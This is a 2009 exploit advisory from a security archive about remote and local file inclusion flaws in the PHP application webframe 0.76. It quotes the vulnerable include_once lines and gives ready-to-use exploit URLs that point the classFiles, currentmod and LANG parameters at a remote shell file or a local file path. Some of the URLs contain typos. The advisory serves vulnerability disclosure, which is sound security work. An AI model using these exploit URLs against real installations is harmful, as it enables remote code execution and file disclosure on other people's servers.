webframe 0.76 Multiple File Inclusion Vulnerabilities

2009.02.12
Credit: ahmadbady
Risk: High
Local: No
Remote: Yes
CWE: CWE-94

-----------------[-Rfi/Lfi-]----------------- script:webframe 0.76 ------------------------------------------------------------------ download from:http://downloads.sourceforge.net/phpwebframe/webframe-0.76-src.tar.gz?modtime=1155546760&big_mirror=0 ------------------------------------------------------------------ ........................................................ vul1: /mod/admin/doc/index.php line 3; include_once "$classFiles/xml.php"; ============================================== vul2:/mod/index.php line 5,7,9,11,13; include_once "$classFiles/table.php"; //html class include_once "$classFiles/html.php"; //Database class include_once "$classFiles/mysql.php"; //Form class include_once "$classFiles/form.php"; //Language file include "../$currentmod/lang/$LANG.php"; ----> = lfi ============================================================ vul3: /mod/base/menu.php line 17; include_once "$classFiles/mysql.php ============================================================ ----------------------------------------------------- xpl rfi: http://127.0..0.1/path/mod/admin/doc/index.php?classFiles=[shell.txt?] http://127.0.0.1/path/mod/index.php?classFiles=[shell.txt?] http://127.0.0..1/path/mod/base/menu.php?classFiles=[shell.txt?] xpl lfi: http://127.0.0.1/path/mod/index.php?currentmod=[Lfi] http://127.0.0.1/path/mod/index.php?LANG=[Lfi] *************************************************** *************************************************** --------------------------------------------------- Author: ahmadbady [kivi_hacker666@yahoo.com] from[iran] ---------------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top